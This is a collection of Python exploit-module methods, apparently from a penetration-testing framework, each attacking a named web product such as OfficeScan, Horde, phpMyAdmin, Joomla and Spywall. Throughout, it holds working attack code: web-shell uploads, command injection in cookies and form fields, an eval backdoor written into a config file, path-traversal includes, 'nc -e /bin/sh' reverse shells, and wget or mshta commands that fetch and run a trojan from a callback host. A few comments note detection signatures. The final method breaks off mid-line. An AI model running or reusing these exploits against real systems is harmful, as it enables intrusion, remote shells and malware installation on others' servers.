    """Entry point: probe jquery_paths x vulnpaths for an upload endpoint, then request the uploaded file.

    For each candidate path a multipart POST built by getfile() is sent (once to the path
    itself, once with a random trailing segment); an HTTP 200 marks it as found. The
    uploaded file is then requested under each upload_paths prefix and ISucceeded() is
    polled for up to five seconds per attempt. Returns the last ISucceeded() result
    (0 when no path was found).
    """
    self.getargs()
    #test = self.test()
    # NOTE(review): the start message uses self.hostname while the end messages below use
    # self.host; the UserAgent also receives both (base URL from host, vhost from hostname).
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port))
    logging.info("Attacking %s:%d" % (self.hostname, self.port))
    logging.info("VHost: %s" % self.hostname)
    if self.ssl:
        protocol = "https"
    else:
        protocol = "http"
    auth = None
    if self.basicauth_user != "":
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    # Random 16-character name, so the file name itself is not a usable indicator.
    fname_shell = randomstring( 16 ) + ".php" #''.join(random.choice(string.ascii_letters) for _ in range(16))
    fname_multipart_data = self.getfile(fname_shell)
    found_path = False
    useragentstring = ''
    vulnerable_path = ''
    for jquery_path in self.jquery_paths:
        useragentstring = protocol + "://" + self.host + ":" + str( self.port) + "/" + self.basepath
        UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
        for vulpath in self.vulnpaths:
            # The boundary is hard-coded; for defenders that constant is a reliable
            # signature for this tool's upload requests.
            UA.addHeader( "Content-Type", "multipart/form-data; boundary=---------------------------3922242971797626524322043819" )
            vulnerable_path = jquery_path + vulpath
            logging.info( "Checking for vulnerable path: {}".format(useragentstring + vulnerable_path))
            response, response_code = UA.POST(vulnerable_path, fname_multipart_data, return_response_code=True)
            if response_code == 200:
                found_path = True
                break
            vulnerable_path = jquery_path + vulpath + "/" + randomstring( 10)
            logging.info( "Checking for vulnerable path: {}".format(useragentstring + vulnerable_path))
            response, response_code = UA.POST(vulnerable_path, fname_multipart_data, return_response_code=True)
            if response_code == 200:
                found_path = True
                break
        if found_path:
            logging.warning( "Found vulnerable path: {}".format(useragentstring + vulnerable_path))
            break
    # Wait for the upload
    time.sleep(3)
    ret = 0
    if found_path:
        # jquery_path and UA still hold the values from the iteration that broke out above.
        UA.clearHeaders()
        for upload_path in self.upload_paths:
            test_path = jquery_path + upload_path + fname_shell
            logging.info("Triggering our uploaded callback: {}".format( useragentstring + test_path))
            UA.GET(test_path, noresponse=True)
            for i in xrange(0, 5): #wait five seconds for callback
                time.sleep(1)
                ret = self.ISucceeded()
                if ret:
                    break
            if ret:
                break
    if ret:
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port))
    return ret
def run(self):
    """Entry point: authenticate to the OfficeScan console and pass `self.cmd` through proxy_controller.php.

    Login: fetch a LoginTicket from cgiChkMasterPwd.exe?id=0009, compute
    sha256(md5(password) + LoginTicket) and POST it with the username. Then the widget
    pages are visited to initialise cookies and the command is sent in the "T" parameter
    of a modTMCSS proxy request. Without a "cmd" argument a trojan is served and launched
    via mshta.exe; with one, its output is redirected to a file under the widget
    repository and fetched afterwards. Returns 0 on login failures, else 1.
    """
    # Check arguments
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.username = self.argsDict.get("username", self.username)
    self.password = self.argsDict.get("password", self.password)
    if (self.argsDict.get("cmd", self.cmd) == ""):
        self.maketrojan()
        self.TROJANMODE = 1
        # Windows target: mshta.exe fetching from the exploit's HTTP server. For defenders,
        # mshta.exe launched by a web-server/PHP process with an http:// argument is a
        # high-signal EDR event.
        self.cmd = "mshta.exe http://" + self.callback.ip + "/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())
    else:
        self.cmd = "%s>repository/widgetPool/wp1/proxy/modTMCSS/d2" % self.argsDict.get( "cmd", self.cmd)
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))
    # NOTE(review): self.protocol is read throughout but not set in this method -- confirm
    # it is initialised elsewhere (no https/sslport handling here).
    ua = spkproxy.UserAgent("", exploit=self)
    ua.addHeader(
        "User-Agent",
        "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
    )
    # Init
    url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0016"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    # Get LoginTicket
    url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0009"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    m = re.search('"LoginTicket" : ([0-9]+)', data)
    if m is None:
        self.log("[D2SEC] LoginTicket not found")
        return 0
    loginticket = m.group(1)
    # Create encrypted password
    # Actually a hash, not encryption: sha256(hex(md5(password)) + loginticket).
    m = hashlib.md5()
    m.update(self.password)
    md5 = m.hexdigest()
    txt = md5 + loginticket
    n = hashlib.sha256()
    n.update(txt)
    sha256 = n.hexdigest()
    # Authentication
    url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    params = urllib.urlencode({ 'TxtAccount': self.username, 'TMlogonEncrypted': sha256 })
    data = ua.POST(mainurl, params)
    # Crude success check: any response containing "unable" counts as a failed login.
    if "unable" in data:
        self.log("[D2SEC] Authentication error")
        return 0
    # Init cookies
    url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0010"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    url = "/officescan/console/html/widget/index.php"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    # Exploitation
    # The command rides in the "T" parameter behind an "&". For defenders: shell
    # metacharacters in the T parameter of a modTMCSS proxy_controller.php request, or a
    # later GET for .../widgetPool/wp1/proxy/modTMCSS/d2, are the artifacts to alert on.
    url = "/officescan/console/html/widget/proxy_controller.php"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    params = urllib.urlencode({ 'module': 'modTMCSS', 'serverid': '1', 'T': 'D2 & %s' % self.cmd })
    data = ua.POST(mainurl, params)
    self.log("[D2SEC] %s" % data)
    if self.TROJANMODE == 0:
        # Read back the output file the else-branch command redirected into.
        url = "/officescan/console/html/widget/repository/widgetPool/wp1/proxy/modTMCSS/d2"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        self.log("[D2SEC] %s" % data)
    return 1
def run(self):
    """Entry point: two-stage attack over HTTPS -- authentication bypass, then PHP execution.

    Stage 1 POSTs login.php with a "-"-prefixed random uname, then plants a URL-encoded PHP
    stub (written to eval_file via the "olist" cookie and property_box.php). Stage 2 GETs
    eval_file with a base64-encoded PHP snippet in "c": either system(self.command), or the
    PHP-to-MOSDEF payload from get_php_to_mosdef() followed by a poll of ISucceeded().
    In both cases a final request deletes eval_file with "del /Q /F" (Windows target).
    Returns 1 in command mode, else the ISucceeded() result.
    """
    self.getArgs()
    useragentstring = "https://" + self.host + ":%s" % self.port + "/"
    UA = spkproxy.UserAgent(useragentstring, auth=None, hostname=self.host, exploit=self)
    self.log("WP> Sending Exploit Stage 1 - Authentication Bypass")
    data = UA.POST("login.php", "button=Login&attempt=1&uname=-%s" % wp_randomstring(1), extraheaders=None, noresponse=False)
    eval_file = "_" + wp_randomstring(4) + "_" + ".php"
    # Cookie value carrying "%26cmd%20/c%20echo ..." -- for defenders, a cookie containing
    # an URL-encoded "cmd /c echo" is a strong signature regardless of the product.
    eval_code = wp_randomstring( 1 ) + "%26cmd%20/c%20echo%20\"%3c%3f%70%68%70%20%65%76%61%6c%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%24%5f%47%45%54%5b%63%5d%29%29%3b%20%3f%3e\">%20" + eval_file + "&dir"
    UA.SetCookie("olist", eval_code)
    data = UA.POST("property_box.php", "type=Dataset&objectname[]=%s" % (wp_randomstring(1)), extraheaders=None, noresponse=True)
    UA.ClearCookies()
    time.sleep(2)
    if self.command:
        command = "system(\"" + self.command + "\");"
        self.log("WP> Sending Exploit Stage 2 - Executing Command: %s" % self.command)
        data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=False)
        self.log(data)
        time.sleep(2)
        # Cleanup: remove the dropped file.
        command = "system(\"del /Q /F " + eval_file + "\");"
        data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=False)
        ret = 1
    else:
        command = self.get_php_to_mosdef().strip()
        self.log("WP> Sending Exploit Stage 2: Payload\n")
        data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=True)
        time.sleep(2)
        command = "system(\"del /Q /F " + eval_file + "\");"
        data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()), noresponse=False)
        # Poll for the connect-back for up to three seconds.
        for i in xrange(0, 3):
            time.sleep(1)
            ret = self.ISucceeded()
            if ret:
                break
        if not ret:
            self.log("WP> Did not succeed in getting a connectback")
    if ret:
        self.setInfo("WP> %s attacking %s:%d - completed (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port))
    return ret
def upload_file(self):
    """Log in, obtain the dashboard apiKey, upload the JSP in self.filename as a post attachment and request it.

    CALLBACK_IP / CALLBACK_PORT placeholders are substituted first. Authentication is a form
    POST to /j_security_check; the apiKey is scraped from /apiclient/ember/index.jsp; the
    file is sent as multipart to /api/json/dashboard/addPost and then fetched from
    /itplus/FileStorage/<post_id>/d2.jsp. Returns 0 when apiKey or post_id cannot be
    found, else 1 (the final GET is not checked).
    """
    # Open JSP file
    f = open(self.filename, "r")
    fdata = f.read()
    f.close()
    fdata = fdata.replace("CALLBACK_IP", self.callback.ip)
    fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port))
    ua = spkproxy.UserAgent("", exploit=self)
    # Authentication
    url = '/'
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    url = '/j_security_check'
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    params = urllib.urlencode({ 'AUTHRULE_NAME': 'Authenticator', 'clienttype': 'html', 'ScreenWidth': '1920', 'ScreenHeight': '932', 'loginFromCookieData': '', 'ntlmv2': 'false', 'j_username': self.username, 'j_password': self.password, 'signInAutomatically': 'on', 'uname': '' })
    # The login response is not inspected; a failed login only surfaces as "apiKey not found".
    data = ua.POST(mainurl, params)
    # Get apiKey
    url = '/'
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    url = '/apiclient/ember/index.jsp'
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    # Unescaped dots in the pattern match any character; harmless for this literal.
    m = re.search('window.OPM.apiKey = "([^\"]+)";', data)
    if m is None:
        self.log("[D2SEC] - apiKey not found")
        return 0
    # Upload JSP file
    # Hard-coded boundary, a "d2" post body and filename="d2.jsp" under a text/plain part:
    # all fixed strings that a detection rule can key on. The server-side mitigation is
    # to refuse executable extensions on attachment uploads and to store them outside
    # any servlet-mapped path.
    params = '-----------------880735062871553\r\nContent-Disposition: form-data; name="post"\r\n\r\nd2\r\n-----------------880735062871553\r\nContent-Disposition: form-data; name="[object HTMLInputElement]i"; filename="d2.jsp"\r\nContent-Type: text/plain\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------880735062871553--\r\n' % ( len(fdata), fdata)
    url = '/api/json/dashboard/addPost?apiKey=%s&groupID=0' % m.group(1)
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    ua.addHeader(
        "Content-Type",
        "multipart/form-data; boundary=---------------880735062871553")
    data = ua.POST(mainurl, params)
    m = re.search('"post_id":"([^\"]+)"', data)
    if m is None:
        self.log("[D2SEC] - post_id not found")
        return 0
    # Execute uploaded JSP file
    url = "/itplus/FileStorage/%s/d2.jsp" % m.group(1)
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    return 1
def run(self):
    """Entry point: inject a command through the "href" cookie of Horde's services/javascript.php.

    With self.command set, the cookie is "system:<command>" and the result is extracted from
    the "link.href = '#...'" text in the response; the method returns 1 when a result was
    found, else 0. Without a command a TCP listener is opened on self.rcv_port, a
    "system:nc ... -e /bin/sh" cookie is sent, and the connect-back is wrapped in a
    unixShellNode, which is returned (0 on any failure).
    """
    self.getArgs()
    useragentstring = "http://" + self.host + ":%s" % self.port + "/"
    UA = spkproxy.UserAgent(useragentstring, auth=None, hostname=self.host, exploit=self)
    ret = 0
    if self.command:
        self.log("WP> Executing Command: %s" % self.command)
        self.log("WP> Sending Exploit")
        # For defenders: an "href" cookie whose value starts with "system:" on a request
        # to services/javascript.php is the signature of this attack.
        UA.SetCookie("href", "system:" + self.command)
        data = UA.POST("%s/services/javascript.php" % self.hordepath, "app=%s&file=open_calendar.js" % (self.hordeapp), extraheaders=None, noresponse=False)
        lhref = 'link.href = \'#'
        # Character-by-character scan for the marker (data.find(lhref) would be the
        # direct equivalent); the loop does not break, so the last match wins.
        for i in range(len(data)):
            if lhref in data[i:i + len(lhref)]:
                if not '\';' in data[i + len(lhref):i + len(lhref) + 2]:
                    result = data[i + len(lhref):data. find('\n\';', (i + len(lhref)))]
                    ret = 1
        # NOTE(review): `result` is only bound inside the loop; if the marker is never
        # found this line raises NameError instead of reporting failure.
        self.log("WP> Command Result:\n%s\r\n " % prettyprint(result))
        time.sleep(2)
        if ret:
            self.setInfo("WP> %s attacking %s:%d - completed (success!)" % (NAME, self.host, self.port))
        else:
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port))
        return ret
    else:
        lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
        if lsock == 0:
            self.log("WP> Unable to list on port %d" % self.rcv_port)
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port))
            return 0
        self.log("WP> Listening on port %d" % self.rcv_port)
        self.log("WP> Sending Exploit")
        # nc -n ip port -e /bin/sh \&\n
        # For defenders: an outbound nc from the web-server user to a non-standard port,
        # or "nc" with "-e" in a cookie value, are the events to alert on.
        UA.SetCookie( "href", "system:nc -n " + self.callback.ip + " " + str(self.rcv_port) + "%20%2d%65%20%2f%62%69%6e%2f%73%68%20%5c%26%5c%6e")
        data = UA.POST("%s/services/javascript.php" % self.hordepath, "app=%s&file=open_calendar.js" % (self.hordeapp), extraheaders=None, noresponse=True)
        self.log("WP> Awaiting connectback")
        lsock.set_timeout(30)
        # Bare except: any error (not just a timeout) is reported as "Connectback failed".
        try:
            (s2, addr) = lsock.accept()
            s2.set_timeout(2)
        except:
            self.log("WP> Connectback failed")
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port))
            return 0
        telnetshell = Telnet()
        telnetshell.sock = s2
        try:
            shell = shelllistener(shellfromtelnet(telnetshell), logfunction=self.logfunction, simpleShell=1)
        except:
            self.log("WP> Shell listener failed - connection closed")
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port))
            return 0
        node = unixShellNode()
        node.parentnode = self.argsDict["passednodes"][0]
        node.shell = shell
        self.setInfo("WP> %s attacking %s:%d - completed" % (NAME, self.host, self.port))
        return node
def run(self):
    """Stage and launch the trojan through the IWSS administration UI.

    Steps: log in with ``username``/``password``, read the CSRFGuardToken
    from ``/top.jsp``, then save the SSH configuration with the port field
    set to a backtick-wrapped shell one-liner (wget the trojan from
    ``self.callback.ip``, chmod +x, run it).  The HTTP server that serves
    the trojan runs in a background thread; this method then sleeps
    forever to keep that thread alive, so the trailing ``return 1`` is
    never reached.  Returns 0 when no CSRF token could be extracted.

    NOTE(review): credentials are sent over ``self.protocol`` as-is; with
    plain http they travel in clear text.
    """
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.username = self.argsDict.get("username", self.username)
    self.password = self.argsDict.get("password", self.password)

    stage = "/tmp/" + self.trojanname
    self.cmd = ("wget -O " + stage + " http://" + self.callback.ip + "/" + self.trojanname
                + "; chmod +x " + stage + "; " + stage)
    thread.start_new_thread(self.startHTTPServer, ())

    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))

    ua = spkproxy.UserAgent("", exploit=self)

    def absolute(path):
        # Every request is addressed with the full scheme/host/port prefix.
        return "%s://%s:%d%s" % (self.protocol, self.host, self.port, path)

    # Authentication: touch the logon page first, then submit the form.
    ua.GET(absolute('/logon.jsp'))
    login_form = urllib.urlencode({
        'wherefrom': '',
        'wronglogon': 'no',
        'pwd': 'Log On',
        'uid': self.username,
        'passwd': self.password
    })
    ua.POST(absolute('/uilogonsubmit.jsp'), login_form)

    # The anti-CSRF token is embedded in the links of the top frame.
    page = ua.GET(absolute('/top.jsp'), entireresponse=True)
    found = re.search(b'CSRFGuardToken=([^\"]+)', page)
    if found is None:
        self.log("[D2SEC] - Token not found")
        return 0
    token = found.group(1)
    self.log("[D2SEC] - CSRFGuardToken=%s" % token)

    # Exploitation: the SSH port field is passed to a shell unsanitised.
    # (An alternative sink via ManageSRouteSettings/interface_vlanid_sel
    # exists but is not used here.)
    ssh_form = urllib.urlencode({
        'CSRFGuardToken': token,
        'needSSHConfigure': 'yes',
        'SSHStatus': 'enable',
        'SSHPort': '`%s`' % self.cmd,
        'op': 'save',
        'cbSSHStatus': 'enable',
        'btSSHPort': '221'
    })
    ua.POST(absolute("/SSHConfig.jsp"), ssh_form)

    # Block forever so the trojan-serving HTTP thread stays up.
    while 1:
        time.sleep(1)
    return 1
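def run(self):
    """Get code execution through the ``langChoice`` session-file include.

    Flow: GET ``index.php`` to receive a PHPSESSID; POST a ``langChoice``
    value containing PHP so it is stored in ``/tmp/sess_<PHPSESSID>``; then
    POST ``langChoice`` pointing (via ``../`` traversal, NUL terminated so
    any appended suffix is cut off) at that session file so the stored PHP
    is included and executed.

    * Command mode (``self.command`` set): the output is wrapped in
      ``startz``/``endz`` markers and scraped from the responses.  Returns
      1 if the markers were seen, 0 otherwise.
    * Otherwise a PHP MOSDEF connect-back is planted and
      ``self.ISucceeded()`` is polled for up to three seconds; returns the
      poll result.

    Returns 0 early when the version probe fails or no session cookie is
    seen.

    Fixes versus the previous revision: ``ret`` was unbound (NameError)
    when a command produced no markers, only the first of the two POST
    responses was inspected for output even though the include happens on
    the second request, and the connect-back was checked once without
    waiting.
    """
    self.getargs()
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    if self.version == 0:
        if not self.test():
            self.log("Testing didn't find vulnerable target")
            return 0
    self.log("Attacking %s:%d" % (self.host, self.port))
    self.log("Basic Auth User: %s" % self.basicauth_user)
    self.log("VHost: %s" % self.hostname)

    protocol = "https" if self.ssl else "http"
    # Basic-auth object from spkproxy only when a user was supplied.
    auth = None
    if self.basicauth_user:
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" + self.basepath,
                            auth=auth, hostname=self.hostname, exploit=self)

    self.log("Getting index.php to grab our cookie")
    data = UA.GET("index.php")
    self.log("Data=%s" % data)

    phpsessid = UA.cookies.get("PHPSESSID")
    if not phpsessid:
        self.log("Failed to see a php session id!")
        self.log("Cookies=%s" % repr(UA.cookies))
        return 0

    # Second request: include our own session file.  The NUL byte stops
    # the include path before anything the application appends.
    session_include = ("langChoice=../../../../../../../../../../../../../../tmp/sess_"
                       + phpsessid + "\00")

    ret = 0
    if self.command:
        self.log("Command: %s" % self.command)
        self.log("Sending Exploit Reply")
        fields = {}
        fields["langChoice"] = "<? print(\"startz\");passthru(stripslashes(\"" + self.command + "\"));print(\"endz\");?>\00"
        data = UA.POST("index.php", fields)
        expl = UA.POST("index.php", session_include)
        # The stored PHP runs when the session file is included (second
        # request), but check both responses in case the output already
        # shows up on the first one.
        for resp in (data, expl):
            if resp and "startz" in resp:
                result = resp.split("startz")[1].split("endz")[0]
                self.log("Command result=%s" % prettyprint(result))
                ret = 1
                break
        if not ret:
            self.log("Command not run - service patched?!")
    else:
        command = "<?" + self.get_php_to_mosdef().strip() + "?>\00"
        self.log("Command: %s" % command)
        self.log("Sending Exploit Reply")
        fields = {}
        fields["langChoice"] = command
        data = UA.POST("index.php", fields)
        UA.POST("index.php", session_include)
        self.log("Data=%s" % data)
        self.log("Looking for PHP connectback")
        # Give the callback a few seconds to arrive instead of checking once.
        for _ in range(0, 3):
            time.sleep(1)
            ret = self.ISucceeded()
            if ret:
                break

    if ret:
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port))
    return ret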
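def run(self):
    """Plant an ``eval()`` backdoor through the phpMyAdmin setup script.

    Flow: GET ``self.setupfile`` and read its anti-CSRF ``token``; POST a
    ``configuration`` whose serialised ``Servers[0]['host']`` value breaks
    out of the PHP string and appends
    ``if($_GET['s']){eval(base64_decode($_GET['s']));}`` so it ends up in
    the generated config file; then request ``self.configfile`` with
    ``s=<base64 PHP MOSDEF>`` and poll ``self.ISucceeded()`` for up to
    three seconds.  Returns the poll result, or 0 when no token was found.

    Fix versus the previous revision: the token was extracted with
    ``str.strip('value="')``, which strips *any* of those characters from
    both ends, so a token ending in ``a``/``e``/``l``/``u``/``v`` lost its
    trailing characters.  A regex is used instead.
    """
    import re  # local import: only this method needs it

    self.getargs()
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port))
    self.log("Attacking %s:%d" % (self.hostname, self.port))
    self.log("VHost: %s" % self.hostname)

    protocol = "https" if self.ssl else "http"
    # Basic-auth object from spkproxy only when a user was supplied.
    auth = None
    if self.basicauth_user != "":
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
    self.log("useragentstring: %s" % useragentstring)
    UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname,
                            exploit=self)

    # <input type="hidden" name="token" value="aa96b8c97b4908d5cddcdcdddc83d211" />
    response = UA.GET(self.setupfile)
    match = re.search(r'name="token"\s+value="([^"]*)"', response or "")
    if match is None:
        self.log("No usable token found. Will not proceed with attack")
        return 0
    token = match.group(1)
    self.log("Found valid token to use: %s" % token)

    # Pre-encoded payload (urllib.quote_plus mangled it).  Decoded it reads:
    #   :"host']=''; if($_GET['s']){eval(base64_decode($_GET['s']));};
    # i.e. it closes the serialised 'host' string and injects the eval hook.
    command = """:%22host%27%5d=%27%27%3b%20if($_GET%5b%27s%27%5d){eval(base64_decode($_GET%5b%27s%27%5d))%3b}%3b"""
    # PHP's serialised string length must be the decoded length.
    commandlen = len(urllib.unquote(command))
    poststuff = """token=%s&action=save&configuration=a:1:{s:7:%%22Servers%%22%%3ba:1:{i:0%%3ba:6:{s:%s%s//%%22%%3bs:9:%%22localhost%%22%%3bs:9:%%22extension%%22%%3bs:6:%%22mysqli%%22%%3bs:12:%%22connect_type%%22%%3bs:3:%%22tcp%%22%%3bs:8:%%22compress%%22%%3bb:0%%3bs:9:%%22auth_type%%22%%3bs:6:%%22config%%22%%3bs:4:%%22user%%22%%3bs:4:%%22root%%22%%3b}}}&eoltype=unix""" % (
        token, commandlen, command)

    # Push the eval() hook into the config file ...
    UA.POST(self.setupfile, poststuff, noresponse=False)
    # ... and trigger it with the base64 PHP connect-back.
    UA.GET(self.configfile + "?s=%s" % b64encode(self.get_php_to_mosdef()).strip(),
           noresponse=True)

    ret = 0
    for _ in xrange(0, 3):  # wait up to three seconds for the callback
        time.sleep(1)
        ret = self.ISucceeded()
        if ret:
            break

    if ret:
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port))
    return ret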
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) self.username = self.argsDict.get("username", self.username) self.password = self.argsDict.get("password", self.password) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) # Authentication url = "/spywall/login.php" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'loginBtn': 'Login', 'target': '/spywall/executive_summary.php', 'section': '', 'USERNAME': self.username, 'PASSWORD': self.password }) data = ua.POST(mainurl, params) if "login.php" in data: self.log('[D2SEC] Authentication error') return 0 # Exploitation self.cmd = 'd2`%s > cleaner/d2`' % self.cmd url = "/spywall/new_whitelist.php" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) params = urllib.urlencode({ 'applianceid': '1', 'sid': '1', 'oldUrl': '', 'isNew': '1', 'white_ip': self.cmd, 'whitelist': '1', 'ignore_auth': '0', 'white_comment': '' }) data = ua.POST(mainurl, params) url = "/spywall/cleaner/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if '404 Not Found' in data: self.log('[D2SEC] No valid session id found') return 0 if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
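def run(self):
    """Exploit the ``com_search`` ``searchword`` injection in Joomla.

    The ``searchword`` parameter is closed with ``"``, followed by
    ``eval($_GET[c])`` and a ``#`` comment; the PHP to run is passed in the
    ``c`` (and, for the connect-back, base64 in ``d``) query parameters.

    * Command mode (``self.command`` set): the command is wrapped in
      ``---1243---``/``---3421---`` markers and its output scraped from the
      response.  Returns 1 if the markers were seen, else 0.
    * Otherwise a PHP MOSDEF connect-back is sent and ``self.ISucceeded()``
      polled for up to three seconds; returns the poll result.

    Returns 0 early when ``version`` is 0 and ``self.test()`` finds no
    vulnerable target.

    Fix versus the previous revision: ``ret`` was unbound (NameError at the
    final ``if ret``) when a command produced no markers.
    """
    self.getargs()
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Using version: %s" % self.version)
    if self.version == 0:
        if not self.test():
            self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)" % (NAME, self.host, self.port))
            self.log("Testing didn't find vulnerable target")
            return 0
    self.log("Attacking %s:%d" % (self.host, self.port))
    self.log("Basic Auth User: %s" % self.basicauth_user)
    self.log("VHost: %s" % self.hostname)

    protocol = "https" if self.ssl else "http"
    # Basic-auth object from spkproxy only when a user was supplied.
    auth = None
    if self.basicauth_user:
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
    self.log("useragentstring: %s" % useragentstring)
    UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname,
                            exploit=self)

    ret = 0
    if self.command:
        self.log("Command: %s" % self.command)
        # Markers make the output easy to find in the surrounding HTML.
        command = ("print '---1243---\n';passthru('" + self.command
                   + "');print '---3421---\n'; ").strip()
        data = UA.GET("index.php?c=%s&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1" % (urllib.quote_plus(command)))
        if "---1243---" in data:
            result = data.split("1243---")[1].split("---3421")[0]
            self.log("Command data: %s" % prettyprint(data))
            self.log("Command result=%s" % prettyprint(result))
            ret = 1
        else:
            self.log("Command not run - service patched?!")
    else:
        command = self.get_php_to_mosdef().strip()
        self.log("PHP Callback Command: %s" % command)
        # The payload is base64 in `d`; `c` decodes and evals it.  A
        # "Invalid argument supplied for foreach()" in the response is
        # normal when it works.
        UA.GET("index.php?d=%s&c=eval(base64_decode($_GET[d]));&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1" % (b64encode(command).strip()),
               noresponse=True)
        self.log("Looking for PHP connectback")
        for _ in xrange(0, 3):  # wait up to three seconds for the callback
            time.sleep(1)
            ret = self.ISucceeded()
            if ret:
                break
        if not ret:
            self.log("Did not succeed in getting a callback")

    if ret:
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port))
    return ret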
def run(self): for node in self.argsDict['passednodes']: self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log_info("Using version: %s" % self.version) ret = self.check() self.setProgress(30) if not ret: self.setInfo( "%s against %s:%d (failed: didn't find vulnerable target!)" % (NAME, self.host, self.port)) self.log_info("Testing didn't find vulnerable target") return 0 self.log_info("Attacking %s:%d" % (self.host, self.port)) #self.log("Basic Auth User: %s"%self.basicauth_user) #self.log("VHost: %s"%self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath self.log("RequestString: %s" % requestString) UA = spkproxy.UserAgent(requestString, auth=auth, hostname=self.hostname, exploit=self) UA.SetCookie( self.magicCookie_name, self.magicCookie_val) # to clear the authentigation flag. self.log("Cookie: " + 